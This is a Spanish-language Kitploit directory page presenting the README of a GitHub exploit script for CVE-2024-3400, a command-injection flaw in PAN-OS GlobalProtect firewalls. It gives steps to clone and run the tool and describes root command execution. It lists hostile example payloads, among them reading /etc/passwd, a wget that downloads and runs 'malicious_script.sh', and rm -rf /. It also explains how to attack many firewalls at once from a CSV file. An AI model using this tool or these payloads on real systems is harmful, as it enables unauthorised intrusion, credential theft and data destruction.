Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-3400 | Kitploit
Herramientas/GitHubGitHub/yuvvi01/cve-2024-3400
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlRed Teaming
GitHubyuvvi01/cve-2024-3400

CVE-2024-3400

Ver Repositorio
115hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Script de Explotación de Firewall PAN-OS

Este script está diseñado para demostrar la explotación de vulnerabilidades en firewalls PAN-OS. Envía un payload especialmente diseñado al endpoint de la API del firewall para ejecutar comandos arbitrarios. Este exploit apunta específicamente a CVE-2024-3400, una vulnerabilidad de inyección de comandos en la función GlobalProtect del software PAN-OS de Palo Alto Networks para versiones específicas de PAN-OS. Configuraciones de características específicas pueden permitir que un atacante no autenticado ejecute código arbitrario con privilegios de root en el firewall.

Nota: Asegúrate de utilizar este script únicamente con fines legales y éticos, y solo en máquinas en las que tengas permiso para realizar pruebas.

Uso

Para usar este proyecto, sigue estos pasos:

  1. Clona este repositorio:
    root@kitploit:~
    git clone https://github.com/Yuvvi01/CVE-2024-3400
    
    
  2. Cambia al directorio del repositorio:
    root@kitploit:~
    cd CVE-2024-3400
    
    
  3. Instala los módulos requeridos:
    root@kitploit:~
    pip install -r requirements.txt
    
    
  4. Ejecuta el script de Python.
    root@kitploit:~
    python3 exploit.py
    

Sigue las indicaciones para ingresar la dirección IP del firewall PAN-OS vulnerable y el payload a ejecutar.

Ejemplos de Payloads

  1. Listar el contenido del directorio:
    root@kitploit:~
    ls -la
    
    
  2. Imprimir el contenido de un archivo específico:
    root@kitploit:~
    cat /etc/passwd
    
    
  3. Imprimir el nombre de usuario del usuario actual que ha iniciado sesión en el sistema:
    root@kitploit:~
    whoami
    
    
  4. Descargar un archivo de internet (requiere wget o curl instalados):
    root@kitploit:~
    wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
    
    
  5. Ten mucho cuidado con este:
    root@kitploit:~
    rm -rf /
    

Instrucciones para un Uso Seguro

Verificación del Certificado SSL

El script solicitará la ruta del archivo del certificado SSL del servidor del firewall PAN-OS. Si no se proporciona ninguna ruta, el script establecerá automáticamente la verificación SSL en falso, deshabilitando efectivamente SSL.

Instrucciones para el Archivo CSV

Este script te permite explotar múltiples objetivos de firewalls PAN-OS vulnerables usando un archivo CSV. A continuación se presentan las instrucciones para formatear correctamente el archivo CSV:

Formato del Archivo CSV:

El archivo CSV debe tener tres columnas:

ipaddress: La dirección IP del firewall PAN-OS vulnerable. payload: El payload a ejecutar en el firewall. path/to/root_CA_certificate.pem: La ruta al certificado raíz de la CA (déjalo en blanco si la verificación del certificado está deshabilitada).

  • Archivo CSV de Ejemplo:
    root@kitploit:~
    ipaddress,payload,path/to/root_CA_certificate.pem
    192.168.1.1,exploit_payload1,/path/to/certificate.pem
    192.168.1.2,exploit_payload2,
    

Instrucciones:

Crea un archivo CSV con el formato especificado. Completa las direcciones IP, los payloads y las rutas de los certificados raíz de la CA (si corresponde). Asegúrate de proporcionar rutas válidas a los certificados raíz de la CA o deja el campo en blanco si la verificación del certificado está deshabilitada. Ejecuta el script y elige la opción de usar el archivo CSV cuando se te solicite.

Referencias

  • https://www.bleepingcomputer.com/news/security/palo-alto-networks-warns-of-pan-os-firewall-zero-day-used-in-attacks/
  • https://security.paloaltonetworks.com/CVE-2024-3400
Descargar herramienta